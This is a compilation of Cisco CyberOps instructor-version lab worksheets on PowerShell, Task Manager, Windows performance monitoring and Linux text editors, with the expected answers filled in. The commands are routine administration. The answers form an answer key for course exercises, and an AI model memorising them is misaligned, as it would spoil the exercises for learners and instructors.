_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
The Standard User cannot compromise the security of the computer or the privacy of other users.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 10 www.netacad.com
Lab – Using Windows PowerShell (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
The objective of the lab is to explore some of the functions of PowerShell.

Background / Scenario
PowerShell is a powerful automation tool. It is both a command console and a scripting language. In this lab,
you will use the console to execute some of the commands that are available in both the command prompt
and PowerShell. PowerShell also has functions that can create scripts to automate tasks and work together
with the Windows Operating System.

Required Resources
 1 Windows PC with PowerShell installed and Internet access

Step 1: Access PowerShell console.

a. Click Start. Search and select powershell.

b. Click Start. Search and select command prompt.

Step 2: Explore Command Prompt and PowerShell commands.

a. Enter dir at the prompt in both windows.
What are the outputs to the dir command?
____________________________________________________________________________________
____________________________________________________________________________________
Both windows provide a list of subdirectories and files, and associated information like type, file size, date
and time of last write. In PowerShell, the attributes/modes are also shown.
b. Try another command that you have used in the command prompt, such as ping, cd, and ipconfig. What
are the results?
____________________________________________________________________________________
The output in both windows are similar.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 6 www.netacad.com
Lab - Using Windows PowerShell

Step 3: Explore cmdlets.

a. PowerShell commands, cmdlets, are constructed in the form of verb-noun string. To identify the
PowerShell command to list the subdirectories and files in a directory, enter Get-Alias dir at the
PowerShell prompt.
PS C:\Users\CyberOpsUser> Get-Alias dir

CommandTypeNameVersionSource
----------------------------
Aliasdir -> Get-ChildItem
What is the PowerShell command for dir? ______________________________________ Get-ChildItem
b. For more detailed information about cmdlets, navigate to https://technet.microsoft.com/en-
us/library/ee332526.aspx.
c. Close the Command Prompt window when done.

Step 4: Explore the netstat command using PowerShell.

a. At the PowerShell prompt, enter netstat -h to see the options available for the netstat command.
PS C:\Users\CyberOpsUser> netstat -h

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-b] [-e] [-f] [-n] [-o] [-p proto] [-r] [-s] [-x] [-t] [interval]
-a Displays all connections and listening ports.
-b Displays the executable involved in creating each connection or listening port.
In some cases well-known executables host multiple independent components, and in
these cases the sequence of components involved in creating the connection or
listening port is displayed. In this case the executable name is in [] at the bottom,
on top is the component it called, and so forth until TCP/IP was reached. Note that
this option can be time-consuming and will fail unless you have sufficient
permissions.
<some output omitted>
b. To display the routing table with the active routes, enter netstat -r at the prompt.
PS C:\Users\CyberOpsUser> netstat -r
===========================================================================
Interface List
3...08 00 27 a0 c3 53 ......Intel(R) PRO/1000 MT Desktop Adapter
10...08 00 27 26 c1 78 ......Intel(R) PRO/1000 MT Desktop Adapter #2
1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table

===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.5 25
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 6 www.netacad.com
Lab - Using Windows PowerShell

169.254.0.0 255.255.0.0 On-link 169.254.181.151 281

169.254.181.151 255.255.255.255 On-link 169.254.181.151 281
169.254.255.255 255.255.255.255 On-link 169.254.181.151 281
192.168.1.0 255.255.255.0 On-link 192.168.1.5 281
192.168.1.5 255.255.255.255 On-link 192.168.1.5 281
192.168.1.255 255.255.255.255 On-link 192.168.1.5 281
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 192.168.1.5 281
224.0.0.0 240.0.0.0 On-link 169.254.181.151 281
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 192.168.1.5 281
255.255.255.255 255.255.255.255 On-link 169.254.181.151 281
===========================================================================
Persistent Routes:
None

IPv6 Route Table

===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 331 ::1/128 On-link
3 281 fe80::/64 On-link
10 281 fe80::/64 On-link
10 281 fe80::408b:14a4:7b64:b597/128
On-link
3 281 fe80::dd67:9e98:9ce0:51e/128
On-link
1 331 ff00::/8 On-link
3 281 ff00::/8 On-link
10 281 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
What is the IPv4 gateway?
____________________________________________________________________________________
Answers will vary. The gateway is 192.168.1.1 in this example.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 6 www.netacad.com
Lab - Using Windows PowerShell

c. Open and run a second PowerShell with elevated privileges. Click Start. Search for PowerShell and right-
click Windows PowerShell and select Run as administrator. Click Yes to allow this app to make
changes to your device.

d. The netstat command can also display the processes associated with the active TCP connections. Enter
the netstat -abno at the prompt.
PS C:\Windows\system32> netstat -abno

Active Connections

Proto Local Address Foreign Address State PID

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756
RpcSs
[svchost.exe]
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
Can not obtain ownership information
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 444
Can not obtain ownership information
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 440
Schedule
[svchost.exe]
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 304
EventLog
[svchost.exe]
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1856
[spoolsv.exe]
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 544
<some output omitted>
e. Open the Task Manager. Navigate to the Details tab. Click the PID heading so the PID are in order.
f. Select one of the PIDs from the results of netstat -abno. PID 756 is used in this example.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 6 www.netacad.com
Lab - Using Windows PowerShell

g. Locate the selected PID in the Task Manager. Right-click the selected PID in the Task Manager to open
the Properties dialog box for more information.

What information can you get from the Details tab and the Properties dialog box for your selected PID?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
PID 756 is associated with svchost.exe process. The user for this process is NETWORK SERVICE and it
is using 4132K of memory.

Step 5: Empty recycle bin using PowerShell.

PowerShell commands can simplify management of a large computer network. For example, if you wanted to
implement a new security solution on all servers in the network you could use a PowerShell command or
script to implement and verify that the services are running. You can also run PowerShell commands to
simplify actions that would take multiple steps to execute using Windows graphical desktop tools.
a. Open the Recycle Bin. Verify that there are items that can be deleted permanently from your PC. If not,
restore those files.
b. If there are no files in the Recycle Bin, create a few files, such as text file using Notepad, and place them
into the Recycle Bin.
c. In a PowerShell console, enter clear-recyclebin at the prompt.
PS C:\Users\CyberOpsUser> clear-recyclebin

Confirm
Are you sure you want to perform this action?
Performing the operation "Clear-RecycleBin" on target "All of the contents of the
Recycle Bin".
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is
"Y"): y
What happened to the files in the Recycle Bin?
____________________________________________________________________________________
The files in the Recycle Bin are deleted permanently.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 6 www.netacad.com
Lab - Using Windows PowerShell

Reflection
PowerShell was developed for task automation and configuration management. Using the Internet, research
commands that you could use to simplify your tasks as a security analyst. Record your findings.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 6 www.netacad.com
Lab – Windows Task Manager (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will explore Task Manager and manage processes from within Task Manager.
Part 1: Working in the Processes tab
Part 2: Working in the Services tab
Part 3: Working in the Performance tab

Background / Scenario
The Task Manager is a system monitor program that provides information about the processes and programs
running on a computer. It also allows the termination of processes and programs and modification of process
priority.

Required Resources
 A Windows PC with Internet access

Part 1: Working in the Processes tab

a. Open a command prompt and a web browser.
Microsoft Edge is used in this lab; however, any web browser will work. Just substitute your browser
name whenever you see Microsoft Edge.
b. Right-click the Task bar to open Task Manager. Another way to open the Task Manager is to press Ctrl-
Alt-Delete to access the Windows Security screen and select Task Manager.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 11 www.netacad.com
Lab – Windows Task Manager

c. Click More details to see all the processes that are listed in the Processes tab.

d. Expand the Windows Command Processor heading. What is listed under this heading?
____________________________________________________________________________________
Command Prompt
e. There are three categories of processes listed in the Processes tab: Apps, Background processes, and
Windows processes.
o The Apps are the applications that you have opened, such as Microsoft Edge, Task Manager, and
Windows Command Processor, as shown in the figure above. Other applications that are opened by
the users, such as web browsers and email clients, will also be listed here.
o The Background processes are executed in the background by applications that are currently open.
o The Windows processes are not shown in the figure. Scroll down to view them on your Windows PC.
Windows processes are Microsoft Windows services that run in the background.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 11 www.netacad.com
Lab – Windows Task Manager

Some of the background processes or Windows processes may be associated with foreground
processes. For example, if you open a command prompt window, the Console Window Host process will
be started in the Windows process section, as shown below.

f. Right-click Console Window Host and select Properties. What is the location of this filename and
location of this process?
____________________________________________________________________________________
The associated filename is conhost.exe and it is located in the C:\Windows\System32 folder.
g. Close the command prompt window. What happens to Windows Command Processor and Console
Window Host when the command prompt window is closed?
____________________________________________________________________________________
The associated processes have ended and are no longer listed in the Task Manager.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 11 www.netacad.com
Lab – Windows Task Manager

b. Click the Memory heading. Click the Memory heading a second time.

What effect does this have on the columns?

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 11 www.netacad.com
Lab – Windows Task Manager

c. Right-click on the Memory heading, and then select Resource values > Memory > Percents.

What affect does this have on the Memory column?

____________________________________________________________________________________
The column now displays memory usage in percentage values.
How could this be useful?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Displaying processes in this way can assist an administrator in determining what services may be causing
memory issues by showing how much available memory is being used by each service.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 11 www.netacad.com
Lab – Windows Task Manager

d. Return to the Task Manager. Click the Name heading.

e. Double-click the Microsoft Edge. What happens?

____________________________________________________________________________________
A new web browser window opens and the Task Manager is minimized.
f. Right-click Microsoft Edge, and select End task. What happens to the web browser windows?
____________________________________________________________________________________
All Microsoft Edge windows are closed.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 11 www.netacad.com
Lab – Windows Task Manager

Part 2: Working in the Services tab

a. Click the Services tab. Use the scroll bar on the right side of the Services window to view all the services
listed.

What statuses are listed?

____________________________________________________________________________________
Stopped and Running.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 11 www.netacad.com
Lab – Windows Task Manager

Part 3: Working in the Performance tab

a. Click the Performance tab.

How many threads are running?

____________________________________________________________________________________
Answers may vary. The example displays 1271.
How many processes are running?
____________________________________________________________________________________
Answers may vary. The example displays 104.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 11 www.netacad.com
Lab – Windows Task Manager

b. Click the Memory in the left panel of the Performance tab.

What is the total physical memory (MB)?

____________________________________________________________________________________
Answers may vary. The example shows 4GB (above memory chart on right).
What is the available physical memory (MB)?
____________________________________________________________________________________
Answers may vary. The example displays 2.5 GB.
How much physical memory (MB) is being used by the computer?
____________________________________________________________________________________
Answers may vary. The example displays 1.4 GB.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 11 www.netacad.com
Lab – Windows Task Manager

c. Click the Ethernet Chart in the left panel of the Performance tab.

What is the link speed?

____________________________________________________________________________________
Answers may vary. The example shows that it is a Ethernet Connection.
What is the IPv4 address of the PC?
____________________________________________________________________________________
Answers may vary. The example shows 192.168.1.15.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 11 www.netacad.com
Lab – Windows Task Manager

d. Click Open Resource Monitor to open the Resource Monitor utility from the Performance tab in Task
Manager.

Reflection
Why is it important for an administrator to understand how to work within the Task Manager?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers may vary. The Task Manager can be a valuable tool for an administrator when troubleshooting
problems with a Windows PC. It provides information about CPU, memory, disk, and network usage. It also
provides a way to end tasks or cancel processes.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 11 of 11 www.netacad.com
Lab - Monitor and Manage System Resources in Windows
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will use administrative tools to monitor and manage Windows system resources.

Recommended Equipment
 A Windows PC with Internet access

Part 1: Starting and Stopping the Routing and Remote Access service
You will explore what happens when a service is stopped and then started. In this part, you will use routing
and remote access service as the example service. This service allows the local device to become a router or
a remote access server.
a. Click Start > Search and select Control Panel > Click Network and Sharing Center.
Note: If your Control Panel is set to View by: Category, change it to View by: Large icons or View by:
Small icons. This lab assumes that you are using one of these settings.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

b. Click Change adapter settings in the left pane. Reduce the size of the Network Connections window
and leave it open.

c. Navigate to the Administrative Tools. (Click Start > Search for and select Control Panel > Click
Administrative Tools)

d. The Administrative Tools window opens. Double-click the Performance Monitor icon.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

e. The Performance Monitor window opens. Make sure Performance Monitor in the left pane is
highlighted. Click the Freeze Display icon (pause button) to stop the recording.

f. Right-click the Performance Monitor menu bar and select Clear to clear the graph. Leave this window
open.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

g. Navigate to the Administrative Tools window and select Services.

h. Expand the width of the Services window so you have a clear view of the content. Scroll down in the right
pane until you see the service Routing and Remote Access. Double-click Routing and Remote Access.

i. The Routing and Remote Access Properties (Local Computer) window opens. In the Startup type
drop-down field, select Manual and then click Apply.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

The Start button is now active. Do NOT click the Start button yet. Leave this window open.

j. Navigate to Performance Monitor window. Click the Unfreeze Display icon to start the recording.
k. Click the Routing and Remote Access Properties (Local Computer) window. To start the service, click
Start. A window with a progress bar opens.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

l. The Routing and Remote Access Properties (Local Computer) window now shows the Stop and
Pause button active. Leave this window open

m. Navigate to Network Connections window. Press the function key F5 to refresh the content.
What changes appear in the window after starting the Routing and Remote Access service?
____________________________________________________________________________________
An Incoming Connections icon is now displayed.
n. Navigate to Routing and Remote Access Properties (Local Computer) window and click Stop.
o. Navigate to Network Connections window.
What changes appear in the right pane after stopping the Routing and Remote Access service?
____________________________________________________________________________________
The Incoming Connections icon is no longer displayed.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

p. Navigate to Performance Monitor window and click the Freeze Display icon to stop the recording.

Which Counter is being recorded the most in the graph (hint: look at the graph color and Counter color)?
____________________________________________________________________________________
%Processor Time.
q. Click the Change graph type drop-down menu, select Report.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

r. The display changes to report view.

What values are displayed by the counter?

____________________________________________________________________________________
Answers may vary. Processor Information % Processor Time: 2.804
s. Click the Routing and Remote Access Properties (Local Computer) window. In the Startup type field,
select Disabled and click OK.

t. Click the Services window.

What is the Status and Startup Type for Routing and Remote Access?
____________________________________________________________________________________
Status is blank and Startup Type is Disabled.
u. Click the Performance Monitor window. Click the Unfreeze Display icon to start the recording.
v. Close all open windows you opened during Part 1 of this lab.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

Part 2: Working in the Computer Management Utility

The Computer Management is used to manage a local or remote computer. The tools in this utility are
grouped into three categories: system tools, storage, and services and applications.
a. Click Control Panel > Administrative Tools. Select Computer Management.
b. The Computer Management window opens. Expand the three categories by clicking on the arrow next
to System Tools.

c. Click the arrow next to Event Viewer then click the arrow next to Windows Logs. Select System.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

d. The Event Properties window opens for the first event. Click the down arrow key to locate an event for
Routing and Remote Access. You should find four events that describe the order for starting and
stopping the Routing and Remote Access service.

What are the descriptions for each of the four events?

Part 3: Configuring Administrative Tools

For the rest of this lab, you will configure Advanced Administrative Tool features and monitor how this affects
the computer.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

a. Click Control Panel > Administrative Tools > Performance Monitor. The Performance Monitor window
opens. Expand Data Collector Sets. Right-click User Defined, and select New > Data Collector Set.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 11 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

b. The Create new Data Collector Set window opens. In the Name field, type Memory Logs. Select the
Create manually (Advanced) radio button, and click Next.

c. The What type of data do you want to include? screen opens. Check the Performance counter box
then click Next.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 12 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

d. The Which performance counters would you like to log? screen opens. Click Add.

e. From the list of available counters, locate and expand Memory. Select Available MBytes and click
Add>>.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 13 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

f. You should see the Available MBytes counter added in the right pane. Click OK.

g. Set the Sample interval field to 4 seconds. Click Next.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 14 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

h. In the Where would you like the data to be saved? screen, click Browse.

i. The Browse For Folder window opens. Select your (C:) drive which is Local Disk (C:) in the figure
below. Select PerfLogs and click OK.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 15 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

j. The Where would you like the data to be saved? window opens with the directory information that you
selected in the previous step. Click Next.

k. The Create the data collector set? screen opens. Click Finish.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 16 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

l. Expand User Defined, and select Memory Logs. Right-click Data Collector01and select Properties.

m. The DataCollector01 Properties window opens. Change the Log format: field to Comma Separated.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 17 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

n. Click the File tab.

What is the full path name to the example file?

____________________________________________________________________________________
Answers may vary. In this example: C:\PerfLogs\DESKTOP-NDFE14H_20170514-
000001\DataCollector01.csv
o. Click OK.
p. Select the Memory Logs icon in the left pane of the Performance Monitor window. Click the green
arrow icon to start the data collection set. Notice a green arrow is placed on top of the Memory Logs
icon.

q. To force the computer to use some of the available memory, open and close a browser.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 18 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

r. Click the black square icon to stop the data collection set.

What change do you notice for the Memory Logs icon?

____________________________________________________________________________________
The green arrow has been removed from the icon.
s. Click Start > Computer, and click drive C: > PerfLogs. Locate the folder that starts with your PC’s name
followed by a timestamp, DESKTOP-NDFE14H_20170514-000001 in the example. Double-click the
folder to open it, and then double-click the DataCollector01.csv file. If prompted, click Continue to
permit access to the folder.

Note: If the Windows cannot open the file: message is displayed, select the radio button Select a
program from a list of installed programs > OK > Notepad > OK.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 19 of 20 www.netacad.com
Lab – Monitor and Manage System Resources in Windows

What does the column farthest to the right show?

____________________________________________________________________________________
Available memory in MBytes.
t. Close the DataCollector01.csv file and the window with the PerfLogs folder.
u. Select the Performance Monitor window. Right-click Memory Logs > Delete.

v. The Performance Monitor > Confirm Delete window opens. Click Yes.
w. Open drive C: > PerfLogs folder. Right-click on the folder that was created to hold the Memory log file,
then click Delete.
x. The Delete Folder window opens. Click Yes.
y. Close all open windows.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 20 of 20 www.netacad.com
Lab – Working with Text Files in the CLI (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will get familiar with Linux command line text editors and configuration files.

Required Resources
 CyberOps Workstation Virtual Machine

Part 1: Graphical Text Editors

Before you can work with text files in Linux, you must get familiar with text editors.
Text editors are one of the oldest categories of applications created for computers. Linux, like many other
operating systems, has many different text editors, with various features and functions. Some text editors
include graphical interfaces, while others are only usable via the command line. Each text editor includes a
feature set designed to support a specific work scenario. Some text editors focus on the programmer and
include features such as syntax highlighting, bracket matching, find and replace, multi-line Regex support,
spell check, and other programming-focused features.
To save space and keep the virtual machine lean, the Cisco CyberOps VM only includes SciTE as graphical
text editor application. SciTE is a simple, small and fast text editor. It does not have many advanced features
but it fully supports the work done in this course.
Note: The choice of text editor is a personal one. There is no such thing as a best text editor. The best text
editor is the one that you feel most comfortable with and works best for you.

Step 1: Open SciTE from the GUI

a. Log on to the CyberOps VM as the user analyst using the password cyberops. The account analyst is
used as the example user account throughout this lab.
b. On the top bar, navigate to Applications > CyberOPS > SciTE to launch the SciTE text editor.
c. SciTE is simple but includes a few important features: tabbed environment, syntax highlighting and more.
Spend a few minutes with SciTE. In the main work area, type or copy and paste the text below:
“Space, is big. Really big. You just won't believe how vastly, hugely, mindbogglingly big it is. I mean, you
may think it's a long way down the road to the chemist, but that's just peanuts to space.”
― Douglas Adams, The Hitchhiker’s Guide to the Galaxy
d. Click File > Save to save the file. Notice that SciTE attempts to save the file to the current user’s home
directory, which is analyst, by default. Name the file space.txt and click Save.
e. Close SciTE by clicking the X icon on the upper right side of the window and then reopen SciTE.
f. Click File > Open… and search for the newly saved file, space.txt.
Could you immediately find space.txt? ____________________________________________ No
g. Even though SciTE is looking at the correct directory (/home/analyst), space.txt is not displayed. This is
because SciTE is looking for known extensions and .txt is not one of them. To display all files, click the
dropdown menu at the bottom of the Open File window and select All Files (*).
h. Select space.txt to open it.
Note: While the Linux file systems do not rely on extensions, some applications such as SciTE may
attempt to use them to identify file types.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 1 of 11
Lab – Working with Text Files in the CLI

i. Close space.txt when finished.

Step 2: Open SciTE from the Terminal.

a. Alternatively, you can also open SciTE from the command line. Click the terminal icon located in the
Dock at the bottom. The terminal emulator opens.
b. Type ls to see the contents of the current directory. Notice space.txt is listed. This means you do not
have to provide path information to open the file.
c. Type scite space.txt to open SciTE. Note that this will not only launch SciTE in the GUI, but it will also
automatically load the space.txt text file that was previously created.
[analyst@secOps ~]$ scite space.txt
d. Notice that while SciTE is open on the foreground, the terminal window used to launch it is still open in
the background. In addition, notice that the terminal window used to launch SciTE no longer displays the
prompt.
Why the prompt is not shown?
____________________________________________________________________________________
____________________________________________________________________________________
Because the window is running SciTE, and therefore, unable to receive commands.
e. Close this instance of SciTE by either clicking the X icon as before, or by switching the focus back to the
terminal window that launched SciTE and stopping the process. You can stop the process by pressing
CTRL+C.
Note: Starting SciTE from the command line is helpful when you want to run SciTE as root. Simply
precede scite with the sudo command, sudo scite.
f. Close SciTE and move on to the next section.

Part 2: Command Line Text Editors

While graphical text editors are convenient and easy to use, command line-based text editors are very
important in Linux computers. The main benefit of command line-based text editors is that they allow for text
file editing from a remote shell on a remote computer.
Consider the following scenario: a user must perform administrative tasks on a Linux computer but is not
sitting in front of that computer. Using SSH, the user starts a remote shell to the aforementioned computer.
Under the text-based remote shell, the graphical interface may not be available which makes it impossible to
rely on graphical text editors. In this type of situation, text-based text editors are crucial.
Note: This is mainly true when connecting to remote, headless servers that lack a GUI interface.
The Cisco CyberOps VM includes a few command line-based text editors. This course focuses on nano.
Note: Another extremely popular text editor is called vi. While the learning curve for vi is considered steep, vi
is a very powerful command line-based text editor. It is included by default in almost all Linux distributions and
its original code was first created in 1976. An updated version of vi is named vim which stands for vi-
improved. Today most vi users are actually using the updated version, vim.
Due to the lack of graphical support, nano (or GNU nano) can be controlled solely through the keyboard.
CTRL+O saves the current file; CTRL+W opens the search menu. GNU nano uses a two-line shortcut bar at
the bottom of the screen, where a number of commands for the current context are listed. After nano is open,
press CTRL+G for the help screen and a complete list.
a. In the terminal window, type nano space.txt to open the text file created in Part 1.
[analyst@secOps ~]$ nano space.txt

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 2 of 11
Lab – Working with Text Files in the CLI

b. nano will launch and automatically load the space.txt text file. While the text may seem to be truncated
or incomplete, it is not. Because the text was created with no return characters and line wrapping is not
enabled by default, nano is displaying one long line of text.
Use the Home and End keyboard keys to quickly navigate to the beginning and to the end of a line,
respectively.
What character does nano use to represent that a line continues beyond the boundaries of the screen?
____________________________________________________________________________________
____________________________________________________________________________________
The dollar sign ($).
c. As shown on the bottom shortcut lines, CTRL+X can be used to exit nano. nano will ask if you want to
save the file before exiting (‘Y’ for Yes, or N for ‘No’). If ‘Y’ is chosen, you will be prompted to press enter
to accept the given file name, or change the file name, or provide a file name if it is a new unnamed
document.
d. To control nano, you can use CTRL, ALT, ESCAPE or the META keys. The META key is the key on the
keyboard with a Windows or Mac logo, depending on your keyboard configuration.
e. Navigation in nano is very user friendly. Use the arrows to move around the files. Page Up and Page
Down can also be used to skip forward or backwards entire pages. Spend some time with nano and its
help screen. To enter the help screen, press CTRL+G.

Part 3: Working with Configuration Files

In Linux, everything is treated as a file. The memory, the disks, the monitor output, the files, the directories;
from the operating system standpoint, everything is a file. It should be no surprise that system itself is
configured through files. Known as configuration files, they are usually text files and are used by various
applications and services to store adjustments and settings for that specific application or service. Practically
everything in Linux relies on configuration files to work. Some services have not one but several configuration
files.
Users with proper permission levels use text editors to change the contents of such configuration files. After
the changes are made, the file is saved and can be used by the related service or application. Users are able
to specify exactly how they want any given application or service to behave. When launched, services and
applications check the contents of specific configuration files and adjust their behavior accordingly.

Step 1: Locating Configuration Files

The program author defines the location of configuration for a given program (service or application). Because
of that, the documentation should be consulted when assessing the location of the configuration file.
Conventionally however, in Linux, configuration files that are used to configure user applications are often
placed in the user’s home directory while configuration files used to control system-wide services are placed
in the /etc directory. Users always have permission to write to their own home directories and are able to
configure the behavior of applications they use.
a. Use the ls command to list all the files in the analyst home directory:
[analyst@secOps ~]$ ls –l
total 20
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:32 space.txt

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 3 of 11
Lab – Working with Text Files in the CLI

While a few files are displayed, none of them seem to be configuration files. This is because it is
convention to hide home-directory-hosted configuration files by preceding their names with a “.” (dot)
character.
b. Use the ls command again but this time add the –a option to also include hidden files in the output:
[analyst@secOps ~]$ ls –la
total 268
drwxr-xr-x 19 analyst analyst 4096 Aug 2 15:43 .
drwxr-xr-x 3 root root 4096 Sep 26 2014 ..
-rw------- 1 analyst analyst 250 May 4 11:42 .atftp_history
-rw------- 1 analyst analyst 13191 Aug 1 09:48 .bash_history
-rw-r--r-- 1 analyst analyst 97 Mar 21 15:31 .bashrc
drwxr-xr-x 4 analyst analyst 4096 Jul 6 10:26 broken_down
drwxr-xr-x 10 analyst analyst 4096 Nov 7 2016 .cache
drwxr-xr-x 12 analyst analyst 4096 Jun 5 11:45 .config
-rw-r--r-- 1 analyst analyst 16384 Apr 12 10:06 .cyberops_topo.py.swp
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
-rw-r--r-- 1 analyst analyst 43 Sep 27 2014 .dmrc
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
-rw-r--r-- 1 analyst analyst 72 Sep 26 2014 .fehbg
drwxr-xr-x 5 analyst analyst 4096 Sep 26 2014 .fluxbox
drwx------ 3 analyst analyst 4096 Sep 7 2016 .gnupg
-rw------- 1 analyst analyst 28920 Aug 2 15:01 .ICEauthority
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 .idlerc
drwxr-xr-x 3 analyst analyst 4096 Sep 27 2014 .java
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
-rw------- 1 analyst analyst 290 Jul 6 15:15 .lesshst
drwxr-xr-x 3 analyst analyst 4096 Sep 26 2014 .local
<Some output omitted>
c. Use cat command to display the contents of the .bashrc file. This file is used to configure user-specific
terminal behavior and customization.
[analyst@secOps ~]$ cat .bashrc
export EDITOR=vim

PS1='\[\e[1;32m\][\u@\h \W]\$\[\e[0m\] '

alias ls="ls --color"
alias vi="vim"
Do not worry too much about the syntax of .bashrc at this point. The important thing to notice is that
.bashrc contains configuration for the terminal. For example, the line PS1='\[\e[1;32m\][\u@\h
\W]\$\[\e[0m\] ' defines the prompt structure of the prompt displayed by the terminal:
[username@hostname current_dir] followed by a dollar sign, all in green. A few other configurations
include shortcuts to commands such as ls and vi. In this case, every time the user types ls, the shell
automatically converts that to ls –color to display a color-coded output for ls (directories in blue, regular
files in grey, executable files in green, etc.)
The specific syntax is out of the scope of this course. What is important is understanding that user
configurations are conventionally stored as hidden files in the user’s home directory.
d. While configuration files related to user applications are conventionally placed under the user’s home
